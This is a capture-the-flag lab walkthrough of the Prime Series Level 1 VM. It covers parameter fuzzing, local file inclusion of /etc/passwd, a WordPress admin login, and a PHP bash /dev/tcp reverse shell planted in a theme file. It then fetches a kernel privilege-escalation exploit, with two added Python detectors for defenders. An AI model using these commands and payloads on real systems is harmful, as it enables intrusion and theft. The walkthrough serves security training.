000000875:   200        7 L      12 W       136 Ch      "validatior"
000000884:   200        7 L      12 W       136 Ch      "viewer"
000000878:   200        7 L      12 W       136 Ch      "vb"
000000877:   200        7 L      12 W       136 Ch      "var"
000000900:   200        7 L      12 W       136 Ch      "webadmin"
000000904:   200        7 L      12 W       136 Ch      "webdata"
000000912:   200        7 L      12 W       136 Ch      "webmail"
000000921:   200        7 L      12 W       136 Ch      "welcome"
000000920:   200        7 L      12 W       136 Ch      "webvpn"
000000915:   200        7 L      12 W       136 Ch      "webservice"
000000917:   200        7 L      12 W       136 Ch      "website"
000000919:   200        7 L      12 W       136 Ch      "webstats"
000000918:   200        7 L      12 W       136 Ch      "webstat"
000000916:   200        7 L      12 W       136 Ch      "webservices"
000000914:   200        7 L      12 W       136 Ch      "websearch"
000000911:   200        7 L      12 W       136 Ch      "weblogs"
000000913:   200        7 L      12 W       136 Ch      "webmaster"
000000910:   200        7 L      12 W       136 Ch      "weblogic"
000000907:   200        7 L      12 W       136 Ch      "webhits"
000000906:   200        7 L      12 W       136 Ch      "webdist"
000000903:   200        7 L      12 W       136 Ch      "webcart"
000000905:   200        7 L      12 W       136 Ch      "webdav"
000000909:   200        7 L      12 W       136 Ch      "weblog"
000000922:   200        7 L      12 W       136 Ch      "wellcome"
000000899:   200        7 L      12 W       136 Ch      "webaccess"
000000908:   200        7 L      12 W       136 Ch      "WEB-INF"
000000902:   200        7 L      12 W       136 Ch      "webboard"
000000901:   200        7 L      12 W       136 Ch      "webapp"
000000924:   200        7 L      12 W       136 Ch      "whatnot"
000000936:   200        7 L      12 W       136 Ch      "www"
000000928:   200        7 L      12 W       136 Ch      "windows"
000000948:   200        7 L      12 W       136 Ch      "zap"
000000945:   200        7 L      12 W       136 Ch      "xsl"
000000946:   200        7 L      12 W       136 Ch      "xsql"
000000944:   200        7 L      12 W       136 Ch      "xmlrpc"
000000943:   200        7 L      12 W       136 Ch      "xml"
000000947:   200        7 L      12 W       136 Ch      "xyz"
000000942:   200        7 L      12 W       136 Ch      "xfer"
000000941:   200        7 L      12 W       136 Ch      "xcache"
000000940:   200        7 L      12 W       136 Ch      "wwwstats"
000000939:   200        7 L      12 W       136 Ch      "wwwlog"
000000931:   200        7 L      12 W       136 Ch      "workplace"
000000933:   200        7 L      12 W       136 Ch      "ws"
000000938:   200        7 L      12 W       136 Ch      "wwwjoin"
000000934:   200        7 L      12 W       136 Ch      "wstats"
000000932:   200        7 L      12 W       136 Ch      "workshop"
000000935:   200        7 L      12 W       136 Ch      "wusage"
000000937:   200        7 L      12 W       136 Ch      "wwwboard"
000000930:   200        7 L      12 W       136 Ch      "work"
000000927:   200        7 L      12 W       136 Ch      "win"
000000929:   200        7 L      12 W       136 Ch      "word"
000000926:   200        7 L      12 W       136 Ch      "will"
000000949:   200        7 L      12 W       136 Ch      "zip"
000000951:   200        7 L      12 W       136 Ch      "zips"
000000923:   200        7 L      12 W       136 Ch      "whatever"
000000925:   200        7 L      12 W       136 Ch      "whois"
000000950:   200        7 L      12 W       136 Ch      "zipfiles"
Total time: 0
Processed Requests: 951
Filtered Requests: 0
Requests/sec.: 0

Add the --hh option to hide the invalid responses by their character count:

└─$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://10.10.10.132/index.php?FUZZ=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.132/index.php?FUZZ=something
Total requests: 951
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000341:   200        7 L      19 W       206 Ch      "file"
Total time: 0.813889
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 1168.462

This yields one valid parameter, file. Try requesting it:

└─$ curl http://10.10.10.132/index.php?file
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>

The response says this is the wrong file. Recall that secret.txt hinted at a location.txt file, so try requesting that:

└─$ curl http://10.10.10.132/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>

The hint says to use the secrettier360 parameter on some other PHP page. The PHP pages found so far are:

  • index.php
  • image.php
  • .php

The .php page cannot be accessed, so request image.php with the secrettier360 parameter:

└─$ curl http://10.10.10.132/image.php?secrettier360
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>

The response confirms this is the right parameter. Check whether it can include the passwd file:

└─$ curl http://10.10.10.132/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>

The saket account stands out: its comment field hints that password.txt is under /home/saket. Include that file:

└─$ curl http://10.10.10.132/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>

The file contains follow_the_ippsec.
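
From the defender's side, both the parameter-name fuzzing against index.php and the file inclusion through image.php are visible in the web server's access log. The following Python is an added example, not part of the original write-up; the log lines and byte sizes are constructed, and the threshold and the "path-like value" pattern are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines; byte sizes are illustrative.
SAMPLE_LOG = """\
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?tmp=something HTTP/1.1" 200 136 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?text=something HTTP/1.1" 200 136 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?tests=something HTTP/1.1" 200 136 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?user=something HTTP/1.1" 200 136 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?upload=something HTTP/1.1" 200 136 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:40:01 -0400] "GET /index.php?file=something HTTP/1.1" 200 206 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:41:10 -0400] "GET /index.php?file=location.txt HTTP/1.1" 200 334 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:42:30 -0400] "GET /image.php?secrettier360 HTTP/1.1" 200 197 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:42:55 -0400] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2631 "-" "-"
10.10.10.128 - - [24/Jul/2023:03:43:20 -0400] "GET /image.php?secrettier360=/home/saket/password.txt HTTP/1.1" 200 215 "-" "-"
10.10.10.1 - - [24/Jul/2023:03:44:00 -0400] "GET /wordpress/?p=1 HTTP/1.1" 200 5120 "-" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Assumption: a value is "path-like" if it is an absolute path, a URL/stream
# wrapper (scheme://) or contains a ../ traversal. parse_qsl already decodes %xx.
PATHLIKE = re.compile(r'^(?:/|[a-z][a-z0-9+.-]*://)|\.\.[/\\]', re.I)


def parse(lines):
    """Turn access-log lines into dicts; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        events.append({
            "ip": m["ip"],
            "path": url.path,
            # keep_blank_values keeps bare names such as "?secrettier360"
            "params": parse_qsl(url.query, keep_blank_values=True),
            "status": int(m["status"]),
            "size": 0 if m["size"] == "-" else int(m["size"]),
        })
    return events


def find_param_fuzzing(events, min_names=5):
    """Clients that tried many distinct parameter names on one path.

    odd_params lists the names whose response size differed from the most
    common size: the same signal the scanner's size filter surfaces.
    """
    groups = defaultdict(list)
    for e in events:
        for name, _value in e["params"]:
            groups[(e["ip"], e["path"])].append((name, e["size"]))
    findings = []
    for (ip, path), seen in groups.items():
        names = {n for n, _ in seen}
        if len(names) < min_names:
            continue
        baseline = Counter(s for _, s in seen).most_common(1)[0][0]
        findings.append({
            "ip": ip, "path": path, "distinct_params": len(names),
            "baseline_size": baseline,
            "odd_params": sorted({n for n, s in seen if s != baseline}),
        })
    return findings


def find_file_inclusion(events):
    """Requests carrying a path-like parameter value, with the number of bytes
    the response exceeded the smallest 200 response seen for that path."""
    smallest = {}
    for e in events:
        if e["status"] == 200:
            smallest[e["path"]] = min(e["size"], smallest.get(e["path"], e["size"]))
    hits = []
    for e in events:
        for name, value in e["params"]:
            if PATHLIKE.search(value):
                hits.append({
                    "ip": e["ip"], "path": e["path"], "param": name, "value": value,
                    "extra_bytes": e["size"] - smallest.get(e["path"], e["size"]),
                })
    return hits


if __name__ == "__main__":
    evts = parse(SAMPLE_LOG.splitlines())
    for f in find_param_fuzzing(evts):
        print("parameter fuzzing:", f)
    for h in find_file_inclusion(evts):
        print("possible file inclusion:", h)
```

A relative value such as location.txt is not matched by the path-like pattern; it shows up instead through odd_params, because the file parameter returned a different size from the baseline.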

Try logging in over SSH as saket and as victor with the password follow_the_ippsec:

└─$ ssh saket@10.10.10.132
The authenticity of host '10.10.10.132 (10.10.10.132)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.132' (ED25519) to the list of known hosts.
saket@10.10.10.132's password:
Permission denied, please try again.
┌──(kali㉿kali)-[~/Desktop/Prime_Series_Level_1]
└─$ ssh victor@10.10.10.132
victor@10.10.10.132's password:
Permission denied, please try again.

Both attempts fail: wrong password.

WordPress

Enumerate users

└─$ wpscan --url http://10.10.10.132/wordpress -e u
_______________________________________________________________
__          _______   _____
\ \        / /  __ \ / ____|
\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
\  /\  /  | |     ____) | (__| (_| | | | |
\/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.132/wordpress/ [10.10.10.132]
[+] Started: Mon Jul 24 04:41:44 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
|  - http://codex.wordpress.org/XML-RPC_Pingback_API
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.132/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
|  - https://www.iplocation.net/defend-wordpress-from-ddos
|  - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
|  - http://10.10.10.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
|  - http://10.10.10.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
|  - http://10.10.10.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
|  Rss Generator (Passive Detection)
|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|  Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Jul 24 04:41:46 2023
[+] Requests Done: 13
[+] Cached Requests: 46
[+] Data Sent: 3.572 KB
[+] Data Received: 8.574 KB
[+] Memory used: 175.719 MB
[+] Elapsed time: 00:00:01

This yields the user victor. Try logging in to the WordPress admin panel with the password obtained earlier, follow_the_ippsec.

Logging in as victor:follow_the_ippsec succeeds.

In the Theme Editor under Appearance, secret.php is writable, so write a one-line reverse shell into it:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/443 0>&1'"); ?>

Requesting /wordpress/wp-content/themes/twentynineteen/secret.php triggers the reverse shell:

└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.132] 51472
bash: cannot set terminal process group (1387): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
<ml/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$
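
The foothold above depends on two conditions a site owner can check for: the dashboard file editor being enabled, and a theme file the web server can write to. The following Python audit is an added example, not part of the original write-up: it checks a wp-config.php for WordPress's DISALLOW_FILE_EDIT constant and scans a theme directory for writable PHP files and process-execution calls. The fixture files, the documentation IP 192.0.2.10 and the function names are constructed for illustration.

```python
import os
import re
import stat
import tempfile

EXEC_CALL = re.compile(
    r"\b(?:exec|system|passthru|shell_exec|popen|proc_open)\s*\(", re.I)
NET_REDIRECT = re.compile(r"/dev/(?:tcp|udp)/")
# Block comments and whole-line // or # comments (string literals are not parsed).
PHP_COMMENTS = re.compile(r"/\*.*?\*/|^\s*(?://|#)[^\n]*", re.S | re.M)
FILE_EDIT = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*(true|false|1|0)\s*\)""",
    re.I)


def file_edit_disabled(wp_config_text):
    """True if wp-config.php switches the dashboard theme/plugin editor off."""
    m = FILE_EDIT.search(PHP_COMMENTS.sub("", wp_config_text))
    return bool(m) and m.group(1).lower() in ("true", "1")


def audit_theme(theme_dir, web_uid=33):
    """Return {relative_path: [reasons]} for PHP files that need a closer look.

    web_uid=33 is www-data in the /etc/passwd shown earlier; pass None to
    skip the ownership check.
    """
    findings = {}
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            st = os.stat(path)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            reasons = []
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if web_uid is not None and st.st_uid == web_uid:
                reasons.append("owned by web server user")
            if EXEC_CALL.search(text):
                reasons.append("process-execution call")
            if NET_REDIRECT.search(text):
                reasons.append("/dev/tcp redirection")
            if reasons:
                findings[os.path.relpath(path, theme_dir)] = reasons
    return findings


def demo():
    """Build a constructed theme directory in a temp dir and audit it."""
    samples = {
        "functions.php": (
            "<?php add_action('after_setup_theme', 'twentynineteen_setup'); ?>\n",
            0o644),
        # Constructed copy of the one-liner shown above, with a documentation IP.
        "secret.php": (
            "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/443 0>&1'\"); ?>\n",
            0o666),
    }
    with tempfile.TemporaryDirectory() as theme:
        for name, (body, mode) in samples.items():
            path = os.path.join(theme, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, mode)
        # Ownership check skipped: the fixture belongs to whoever runs this.
        return audit_theme(theme, web_uid=None)


if __name__ == "__main__":
    print("editor disabled:",
          file_edit_disabled("<?php\ndefine('DISALLOW_FILE_EDIT', true);\n"))
    for rel, why in demo().items():
        print(rel, "->", ", ".join(why))
```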

Host information gathering

Look around to see what files are present:

www-data@ubuntu:/home/saket$ cd /home
cd /home
www-data@ubuntu:/home$ ls -liah
ls -liah
total 16K
1048577 drwxr-xr-x  4 root   root   4.0K Aug 29  2019 .
2 drwxr-xr-x 24 root   root   4.0K Aug 29  2019 ..
536440 drwxr-xr-x  2 root   root   4.0K Aug 31  2019 saket
1061587 drwxr-x--x 20 victor victor 4.0K Sep  1  2019 victor
www-data@ubuntu:/home$ cd saket
cd saket
www-data@ubuntu:/home/saket$ ls -liah
ls -liah
total 36K
536440 drwxr-xr-x 2 root root 4.0K Aug 31  2019 .
1048577 drwxr-xr-x 4 root root 4.0K Aug 29  2019 ..
538264 -rw------- 1 root root   20 Aug 31  2019 .bash_history
538263 -rwxr-x--x 1 root root  14K Aug 30  2019 enc
536446 -rw-r--r-- 1 root root   18 Aug 29  2019 password.txt
526540 -rw-r--r-- 1 root root   33 Aug 31  2019 user.txt
www-data@ubuntu:/home/saket$ cat password.txt
cat password.txt
follow_the_ippsec
www-data@ubuntu:/home/saket$ cat user.txt
cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home$ cd /home/victor
cd /home/victor
www-data@ubuntu:/home/victor$ ls -liah
ls -liah
ls: cannot open directory '.': Permission denied
www-data@ubuntu:/home/victor$
www-data@ubuntu:/home/victor$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
@reboot                 bash /root/t.sh
#
www-data@ubuntu:/home/victor$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
www-data@ubuntu:/home/victor$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
www-data@ubuntu:/home/victor$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/victor$

Local privilege escalation

└─$ cd Desktop/Prime_Series_Level_1
└─$ searchsploit linux ubuntu 4.10.0-28
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                  | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation         | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalatio | linux/local/41760.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
└─$ searchsploit linux ubuntu -m 45010
[!] Could not find EDB-ID #
[!] Could not find EDB-ID #
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/Prime_Series_Level_1/45010.c

Compile the file and start an HTTP server to transfer it to the target:

└─$ sudo gcc 45010.c -o 45010
┌──(kali㉿kali)-[~/Desktop/Prime_Series_Level_1]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
www-data@ubuntu:/home/victor$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://10.10.10.128/45010
wget http://10.10.10.128/45010
--2023-07-24 02:22:23--  http://10.10.10.128/45010
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21616 (21K) [application/octet-stream]
Saving to: '45010'
0K .......... .......... .                               100% 53.2M=0s
2023-07-24 02:22:23 (53.2 MB/s) - '45010' saved [21616/21616]
www-data@ubuntu:/tmp$ wget http://10.10.10.128/45010.c
wget http://10.10.10.128/45010.c
--2023-07-24 02:23:53--  http://10.10.10.128/45010.c
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: '45010.c'
0K .......... ..                                         100%  278M=0s
2023-07-24 02:23:53 (278 MB/s) - '45010.c' saved [13176/13176]
www-data@ubuntu:/tmp$ ls -liah
ls -liah
total 468K
786435 drwxrwxrwt 12 root     root     4.0K Jul 24 02:24 .
2 drwxr-xr-x 24 root     root     4.0K Aug 29  2019 ..
789604 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .ICE-unix
789607 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .Test-unix
790191 -r--r--r--  1 root     root       11 Jul 24 01:00 .X0-lock
789603 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .X11-unix
789605 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .XIM-unix
789606 drwxrwxrwt  2 root     root     4.0K Jul 24 01:00 .font-unix
791565 -rwxr-xr-x  1 www-data www-data  22K Jul 24 02:19 45010
791566 -rw-r--r--  1 www-data www-data  13K Jul 24 02:15 45010.c
www-data@ubuntu:/tmp$ chmod +x 45010
chmod +x 45010
www-data@ubuntu:/tmp$ ./45010
./45010
./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010)
www-data@ubuntu:/tmp$

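The binary built on Kali will not run because the target's glibc is older than the one it was linked against, so compile it locally on the target instead: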

www-data@ubuntu:/tmp$ gcc 45010.c -o 45010x
gcc 45010.c -o 45010x
